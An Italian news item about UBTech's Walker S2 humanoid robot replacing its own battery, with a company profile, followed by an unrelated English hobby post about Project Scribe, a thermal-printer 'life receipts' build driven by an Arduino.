Il robot umanoide Walker S2 sostituisce la propria batteria
Il centro di addestramento per robot umanoidi inaugurato a Shanghai svolgerà un ruolo strategico nello sviluppo dell’intelligenza artificiale applicata alla robotica.
Addestrando robot provenienti da vari contesti industriali e raccogliendo i dati delle loro performance, UBTech potrà migliorare in modo iterativo gli algoritmi di controllo e le capacità cognitive delle proprie macchine, aumentando la loro efficienza e adattabilità a scenari reali sempre più complessi.
youtube.com/embed/mHP1WGlw5Wk?…
Con una storia che parte dal 2012 e un portafoglio di soluzioni che spazia dall’intrattenimento all’industria, UBTech dimostra ancora una volta di puntare sull’innovazione per consolidare la propria leadership nel settore. L’avvio della produzione del Walker S1 nell’ottobre 2024 e il recente annuncio del Walker S2 confermano la strategia dell’azienda: integrare hardware avanzato e intelligenza artificiale per realizzare robot sempre più autonomi e versatili.
In conclusione, UBTech si posiziona come uno degli attori più dinamici nel mercato globale della robotica umanoide, contribuendo a definire il futuro dell’interazione tra uomo e macchina. La capacità di operare 24 ore su 24 senza intervento umano segna una svolta significativa per l’intero settore.
UBTECH ROBOTICS CORP LTD
Fondata nel marzo 2012, UBTECH ROBOTICS CORP LTD è oggi una delle aziende leader a livello globale nel campo dei robot umanoidi e dei robot di servizio intelligenti. Dal 29 dicembre 2023, la società è ufficialmente quotata sul listino principale della Borsa di Hong Kong (codice azionario: 9880.HK).
Animata dalla missione di “portare robot intelligenti in ogni famiglia e rendere la vita quotidiana più comoda e intelligente”, UBTECH ha sviluppato in modo indipendente una gamma completa di tecnologie per la robotica umanoide. Grazie alle proprie competenze full-stack, l’azienda si occupa di ricerca e sviluppo, progettazione, produzione intelligente e commercializzazione di robot di servizio, offrendo una soluzione integrata che combina hardware, software, servizi e contenuti. Le applicazioni spaziano dall’istruzione basata sull’intelligenza artificiale alla logistica, fino all’assistenza agli anziani e ai servizi per le imprese.
UBTECH è tra le poche realtà al mondo ad aver realizzato una piattaforma tecnologica full-stack che integra avanzati sistemi di pianificazione e controllo del movimento, servoattuatori proprietari, tecnologie di visione artificiale, interazione vocale, SLAM (localizzazione e mappatura simultanea), azionamento visivo dei servoattuatori, interazione uomo-robot e il proprio framework applicativo Robot Operating System Application Framework (ROSA). L’azienda si distingue anche per la produzione in serie di servoattuatori a coppia variabile, una conquista tecnologica che ha reso possibile lo sviluppo del Walker, il primo robot umanoide bipede a grandezza naturale commercializzato in Cina.
A giugno 2024, UBTECH deteneva oltre 2.450 brevetti in ambito robotico e di intelligenza artificiale, di cui circa il 60% rappresentano brevetti di invenzione e oltre 450 sono brevetti internazionali. Grazie a questi risultati, l’azienda si è posizionata come leader globale nell’implementazione di robot umanoidi in tre scenari principali: produzione industriale, servizi commerciali e assistenza domestica. Inoltre, UBTECH è attualmente l’unica azienda di robot umanoidi ad aver avviato numerose collaborazioni con case automobilistiche internazionali, inserendo il robot industriale Walker S nelle linee produttive per svolgere attività diversificate.
Con uno sguardo rivolto al futuro, UBTECH crede fermamente nella coesistenza armoniosa tra uomo e robot. Grazie a un impegno costante verso l’innovazione tecnologica, l’azienda mira a portare i propri robot in ogni casa e in ogni settore, contribuendo alla costruzione di una società in cui esseri umani e robot collaborano per migliorare la qualità della vita.
L'articolo Robot umanoide cinese sostituisce la propria batteria e lavora 24 ore al giorno proviene da il blog della sicurezza informatica.
Project Scribe: Receipts for Life
Here’s a fun project. Over on their YouTube page [Urban Circles] introduces Project Scribe.
The idea behind this project is that you can print out little life “receipts”. Notes, jokes, thoughts, anecdotes, memories. These little paper mementos have a physical reality that goes beyond their informational content. You can cut them up, organize them, scribble on them, highlight them, stick them on the wall, or in a scrapbook. The whole idea of the project is to help you make easier and better decisions every day by nudging you in the direction of being more mindful of where you’ve been and where you’re going.
The project is well documented on its GitHub page. The heart of the project is a thermal printer. These are the things that print the receipts you get from the store. You may need to conduct some research to find the best thermal paper to use; there are some hints and tips on this topic in the documentation. In addition to the thermal printer is a pretty stand to hold it and an Arduino board to drive it. Firmware for the Arduino is provided which will serve a basic web interface via WiFi.
If you build one, we’d love to hear how it goes. If it doesn’t work out, you can always fall back to using the thermal printer to level up your Dungeons and Dragons game.
Thanks to [Brittany L] for writing in about this one.
youtube.com/embed/JOlX4iSBhp8?…